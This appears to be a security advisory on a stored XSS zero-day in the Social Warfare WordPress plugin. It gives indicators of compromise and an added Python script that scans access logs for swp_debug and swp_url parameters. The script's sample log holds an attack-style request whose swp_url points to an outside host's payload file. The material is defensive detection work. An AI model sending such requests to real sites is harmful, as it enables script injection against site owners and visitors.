Zero-Day Stored XSS in Social Warfare

From blog.sucuri.net

Exploitation Level: Easy / Remote

DREAD Score: 7.2

Vulnerability: Stored XSS

Patched Version: 3.5.3

A zero-day vulnerability has just appeared in the WordPress plugin world, affecting over 70,000 sites using the Social Warfare plugin.

The plugin is vulnerable to Stored XSS (Cross-Site Scripting) and has been removed from the plugin repository. The attack can be carried out by any visitor to the site.

A patch has been released and users are advised to update to version 3.5.3 as soon as possible.

What Is It All About?

The vulnerable code is contained in some of the plugin's debugging features. These features are not used anywhere in normal operation and are triggered only through specific $_GET parameters, which makes it easy to check your access logs to see whether your site was attacked through this vulnerability.

A fully working PoC is available in the wild and we expect the number of exploit attempts to grow in size in the coming days.

Indicators of Compromise:

Look in your access logs for requests to any PHP file under /wp-admin/ that carry either of the following query parameters:

  • swp_debug
  • swp_url
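
The indicators above are easy to check mechanically. The following is an added example (not code from the original advisory or from the plugin) that scans combined-format access log lines for requests to a PHP file under /wp-admin/ whose query string contains swp_debug or swp_url. The log lines, IP addresses and parameter values in it are constructed for demonstration; only the two parameter names come from the advisory. Parameter names are URL-decoded before matching so that a percent-encoded variant such as swp%5Fdebug is not missed.

```python
"""
Scan web-server access logs for the Social Warfare indicators of compromise:
a request to any PHP file under /wp-admin/ carrying a swp_debug or swp_url
query parameter. Added example; the sample log below is constructed.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Request line inside a common/combined log entry: "GET /path?query HTTP/1.1"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Parameter names named in the advisory as indicators of compromise.
IOC_PARAMS = {"swp_debug", "swp_url"}


def is_ioc_request(target: str) -> bool:
    """True if the request target is a PHP file under /wp-admin/ with an IoC parameter."""
    parts = urlsplit(target)
    path = parts.path.lower()
    if not (path.startswith("/wp-admin/") and path.endswith(".php")):
        return False
    # parse_qs decodes percent-encoded names, so swp%5Fdebug -> swp_debug.
    # keep_blank_values keeps a bare "?swp_debug" (no value) as a parameter.
    names = {k.lower() for k in parse_qs(parts.query, keep_blank_values=True)}
    return bool(names & IOC_PARAMS)


def scan_access_log(lines):
    """Return (line_number, request_target) for every log line matching the IoC."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if m and is_ioc_request(m.group("target")):
            hits.append((lineno, m.group("target")))
    return hits


# Constructed sample log (not real traffic). Lines 1 and 3 should be flagged.
SAMPLE_LOG = [
    '203.0.113.7 - - [21/Mar/2019:10:15:02 +0000] "GET /wp-admin/admin-post.php?swp_debug=1&swp_url=http://203.0.113.7/x.txt HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [21/Mar/2019:10:15:09 +0000] "POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 87 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [21/Mar/2019:10:16:40 +0000] "GET /wp-admin/admin-post.php?swp%5Fdebug=1 HTTP/1.1" 200 498 "-" "curl/7.64.0"',
    '192.0.2.10 - - [21/Mar/2019:10:17:01 +0000] "GET /?swp_debug=1 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [21/Mar/2019:10:17:05 +0000] "GET /wp-admin/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for lineno, target in scan_access_log(SAMPLE_LOG):
        print(f"line {lineno}: {target}")
```

In practice you would feed the script your real access log (for example with `scan_access_log(open("/var/log/nginx/access.log"))`) and treat every hit as a request to investigate, not as proof of a successful attack; the advisory only says these parameters are how the vulnerable debug code is reached.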
